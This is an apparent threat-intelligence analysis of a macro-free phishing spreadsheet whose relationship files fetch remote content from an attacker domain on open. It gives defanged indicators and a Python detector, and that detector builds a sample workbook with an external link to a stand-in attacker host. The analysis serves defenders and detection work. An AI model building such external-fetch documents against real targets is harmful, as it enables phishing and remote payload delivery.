An email from a construction company asked the recipient to review an attached spreadsheet. The signature block listed a contact name and address. SPF and DMARC passed via Microsoft 365. The attached .xlsx, 285 KB, returned a clean verdict from automated scanners.
The sending domain, murrellconstruction[.]com, has been registered since 2013 through GoDaddy. Whether the account was compromised or the attachment was planted through a forwarded thread is unclear. The file contained no VBA macros, no vbaProject.bin, and no embedded executable objects. By the criteria most secure email gateways apply to Office documents, this spreadsheet was clean.
It was not.
Inside the ZIP: What Scanners Missed
Every .xlsx file is a ZIP archive. Unzipping this one and reading the XML reveals what static analysis overlooked. Two relationship files, xl/_rels/workbook.xml.rels and xl/worksheets/_rels/sheet1.xml.rels, each contain an external Target URL pointing to hxxps://thesuccessformula[.]shop/sol/onetu/index[.]php. When a user opens the workbook, Excel's relationship engine resolves that URL and fetches remote content from the attacker-controlled domain.
The domain thesuccessformula[.]shop resolves to 152[.]228[.]223[.]226, returns HTTP 200, publishes DMARC p=none, and has no connection to the construction industry. Document metadata lists the creator as "user" with a creation timestamp of April 24, 2026. Two embedded images in the archive likely serve as visual decoys.
No macro-scanning policy would have caught this. The evasion is structural: a legitimate Office XML feature (T1221) repurposed as an external content fetch trigger.
Why "No Macros" Is Not "No Risk"
Organizations that block or disable macros have closed one door. External relationships in Office XML files represent a different door entirely. The .rels file is a standard part of the Open XML specification. Scanners that check for vbaProject.bin and move on will never see a URL buried inside it.
Detection requires deep inspection of the ZIP archive structure or behavioral detection that evaluates what the document does when opened, not what it contains at rest. Community-driven threat intelligence accelerates recognition of these structural evasion patterns by correlating reports across organizations that have already encountered the technique.
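The deep inspection described above, as an added example that is not part of the original article: walk every `.rels` part inside an Office Open XML ZIP and flag relationships whose `TargetMode="External"` target is an http(s) URL, which is exactly the element a `vbaProject.bin`-only check never reads. The sample workbook, its relationship type and the `attacker.example` URL are constructed for the demonstration, not taken from the real attachment.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Namespace of OOXML package relationships (the *.rels parts inside the ZIP).
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_relationships(ooxml_bytes: bytes) -> list[dict]:
    """Return every external http(s) relationship found in an OOXML archive.

    Each hit is a target the Office application resolves over the network when
    the document is opened, whether or not the file contains any macro.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(part))
            except ET.ParseError:
                continue  # malformed part: nothing a relationship engine could resolve
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # internal parts (worksheets, styles, images) are expected
                target = rel.get("Target", "")
                if urlparse(target).scheme.lower() in ("http", "https"):
                    findings.append({"part": part,
                                     "type": rel.get("Type", "").rsplit("/", 1)[-1],
                                     "target": target})
    return findings


def build_sample_xlsx() -> bytes:
    """Constructed test archive (not the real sample): one ordinary internal
    relationship in workbook.xml.rels plus one external target in sheet1.xml.rels."""
    head = '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    workbook_rels = (head + '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
                     'officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>'
                     '</Relationships>')
    sheet_rels = (head + '<Relationship Id="rId1" TargetMode="External" Type="http://schemas.'
                  'openxmlformats.org/officeDocument/2006/relationships/oleObject" '
                  'Target="https://attacker.example/sol/index.php"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/_rels/workbook.xml.rels", workbook_rels)
        zf.writestr("xl/worksheets/_rels/sheet1.xml.rels", sheet_rels)
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
    return buf.getvalue()


if __name__ == "__main__":
    for hit in external_relationships(build_sample_xlsx()):
        print(f"{hit['part']}: {hit['type']} -> {hit['target']}")
```

Run against a real attachment with `external_relationships(open(path, "rb").read())`; the same walk applies to .docx and .pptx, since all three share the package relationship format.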
The phone number and physical address in the email signature did not match public directory listings for the construction company. That is the kind of inconsistency a human reviewer might catch but an automated scanner will never evaluate.
Indicators of Compromise
| Type | Value | Context |
|---|---|---|
| Sending domain | murrellconstruction[.]com | Legitimate construction domain, registered 2013, possibly compromised |
| Sender address | office@murrellconstruction[.]com | From address |
| Attachment | Murrell Construction.xlsx | 285,812 bytes, no VBA macros |
| External URL | hxxps://thesuccessformula[.]shop/sol/onetu/index[.]php | Embedded in workbook.xml.rels and sheet1.xml.rels |
| Payload domain | thesuccessformula[.]shop | Attacker-controlled, DMARC p=none |
| Payload IP | 152[.]228[.]223[.]226 | Resolves for thesuccessformula[.]shop |
| Document creator | "user" | Generic metadata, no attribution |
| Document created | 2026-04-24T19:42:18Z | File creation timestamp |
| MITRE ATT&CK | T1566.001 (Spearphishing Attachment), T1221 (Template Injection), T1204.002 (User Execution: Malicious File) | Techniques observed |